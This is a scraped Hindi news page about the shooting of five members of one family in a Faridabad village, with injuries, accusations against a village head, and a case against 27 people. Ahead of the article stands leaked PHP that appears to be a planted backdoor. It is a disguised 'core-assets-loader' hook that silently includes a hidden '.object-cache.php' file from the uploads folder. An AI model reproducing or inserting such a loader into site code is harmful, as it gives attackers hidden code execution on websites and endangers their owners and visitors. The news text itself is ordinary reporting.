add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दिल्ली के सटे फरीदाबाद में एक ही परिवार के पांच लोगों की हत्या – SOCH INDIA
Menu

मनोरंजन
दिल्ली के सटे फरीदाबाद में एक ही परिवार के पांच लोगों की हत्या

nobanner

दिल्ली के पास फरीदाबाद में मर्डर की दिल दहला देने वाली वारदात हुई है. यहां एक ही परिवार के पांच लोगों की गोली मारकर हत्या कर दी गई है. पुलिस के मुताबिक आपसी रंजिश में ये वारदात हुई है.

घटना फरीदाबाद के पलवली गांव की है. देर रात कुछ बदमाशों ने एक ही परिवार के पांच लोगों को गोलियों से भून डाला. हमले में आठ लोग घायल भी हुए हैं. पीड़ित परिवार के मुताबिक, सभी लोग घर के पास एक दुकान पर खड़े थे. तभी कुछ बदमाश आए और अंधाधुंध फायरिंग कर दी. परिवार के बाकी सदस्यों ने इलाके के सरपंच पर हत्या का आरोप लगाया है.

एक साथ 5 लोगों की गोली मारकर हत्या से इलाके में हड़कंप मचा है. पुलिस के आला अधिकारी मौके पर पहुंच गए है. फरीदाबाद से सांसद और केंद्रीय मंत्री कृष्णपाल गुर्जर और इलाके की विधायक ने पीड़ित परिवार से मुलाकात की. पुलिस ने शिकायत के आधार पर 27 नामजद लोगों के खिलाफ केस दर्ज किया है.

फरीदाबाद से सांसद और केंद्रीय मंत्री कृष्णपाल गुर्जर दोषियों को सख्त सजा की बात कर रहे हैं. लेकिन इस घटना ने एक बार फिर हरियाणा में कानून व्यवस्था पर सवाल उठा दिए हैं.